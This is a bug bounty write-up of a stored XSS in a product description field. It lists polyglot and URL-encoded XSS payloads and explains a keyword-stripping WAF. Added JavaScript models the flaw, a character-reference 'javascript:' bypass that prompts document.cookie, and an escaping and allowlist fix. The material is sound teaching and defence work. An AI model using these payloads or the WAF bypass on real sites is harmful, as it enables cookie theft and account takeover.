Stored XSS on Product Description [HIGH] — $400

Payloads tried:
  1. " onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)// — Polyglot Payload
  2. '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> — Polyglot Payload
  3. %7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e — URL Encoded (decodes to });});alert`xss`;</script>)
  4. '"><a href='www.anything.com'>Click Here</a> — HTML Injection Check
Observations:
  1. The web application sits behind a WAF (Web Application Firewall).
  2. The WAF strips blocked keywords such as 'javascript' and 'alert' from the input rather than rejecting the request.
  3. The product description field parses the user's input as Markdown.
Result: both the XSS and the HTML injection succeeded. Clicking the injected anchor tag prompts document.cookie.
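The two observations above, a WAF that only deletes the words 'javascript' and 'alert' and a Markdown description field that lets raw HTML through, are enough to explain why the anchor and image payloads survived. The JavaScript below is an added example, not code from this write-up or from the target application: it models both behaviours with a toy keyword-stripping WAF and a toy Markdown renderer, runs a few constructed payloads through that pipeline, and contrasts it with the fix a practitioner would actually ship (escape the user's text before Markdown is applied, and allowlist link schemes instead of blocklisting a word). The payload strings, the function names and the `&#106;avascript:` character-reference trick are illustrations assumed here, not the author's exact payloads.

```javascript
// Added example, not code from the write-up: a minimal model of the two
// observations (keyword-stripping WAF, Markdown field with raw-HTML
// passthrough) and of the fix that would have closed the bug.

// Hypothetical WAF: deletes the blocked words from the raw request body.
const BLOCKED = ["javascript", "alert"];
function wafStrip(rawBody) {
  let out = rawBody;
  for (const kw of BLOCKED) out = out.replace(new RegExp(kw, "gi"), "");
  return out;
}

// URL-decode after the WAF has inspected the body; malformed input is kept as-is.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Toy Markdown renderer with raw-HTML passthrough: only **bold** and
// [label](url) are handled; anything else, tags included, is emitted untouched.
function renderMarkdownUnsafe(text) {
  return text
    .replace(/\*\*(.+?)\*\*/g, "<strong>$1</strong>")
    .replace(/\[([^\]]+)\]\(([^)\s]+)\)/g, '<a href="$2">$1</a>');
}

// Vulnerable pipeline: WAF -> decode -> render with passthrough -> stored HTML.
function storeDescriptionUnsafe(rawBody) {
  return renderMarkdownUnsafe(safeDecode(wafStrip(rawBody)));
}

// Fix 1: escape the user's text before Markdown is applied, so the only tags
// in the output are the ones the renderer itself emits.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Fix 2: allowlist link schemes instead of blocklisting the word "javascript".
function safeHref(url) {
  const u = url.trim().toLowerCase();
  return (u.startsWith("http://") || u.startsWith("https://")) ? url : "#";
}

function renderMarkdownSafe(text) {
  return escapeHtml(text)
    .replace(/\*\*(.+?)\*\*/g, "<strong>$1</strong>")
    .replace(/\[([^\]]+)\]\(([^)\s]+)\)/g,
             (_m, label, url) => `<a href="${safeHref(url)}">${label}</a>`);
}

// Fixed pipeline: no keyword WAF needed; output encoding does the work.
function storeDescriptionSafe(rawBody) {
  return renderMarkdownSafe(safeDecode(rawBody));
}

// Constructed inputs, modelled on the write-up's payloads (not its exact ones).
const PAYLOADS = {
  // neither blocked word appears: the <img> and its onerror survive intact
  imgConfirm: '<img src=x onerror=confirm(1)>',
  // the plain anchor used as the HTML-injection check also survives intact
  anchor: '\'"><a href=\'www.anything.com\'>Click Here</a>',
  // a javascript: URL whose first letter is an HTML character reference:
  // the WAF sees no "javascript", but the browser decodes &#106; to "j"
  // inside the attribute value before it parses the URL
  entityHref: '<a href="&#106;avascript:prompt(document.cookie)">Click Here</a>',
  // the blocklist does catch this one, and this is all it catches
  plainAlert: '<script>alert(1)</script>',
};

// Runs every payload through both pipelines and returns the stored HTML.
function demo() {
  const results = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    results[name] = {
      unsafe: storeDescriptionUnsafe(p),
      safe: storeDescriptionSafe(p),
    };
  }
  return results;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, r] of Object.entries(demo())) {
    console.log(name, "\n  unsafe:", r.unsafe, "\n  safe:  ", r.safe);
  }
}
```

Run it with `node`. The keyword WAF removes only the literal word `alert`, so `confirm(1)`, `prompt(document.cookie)` and the character-reference-encoded `javascript:` URL all reach the stored HTML untouched; the safe renderer turns every `<` the user typed into `&lt;` and never emits a link whose scheme is not http or https, which is the property to test for rather than the absence of particular words.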
Emanuel Beni Harijanto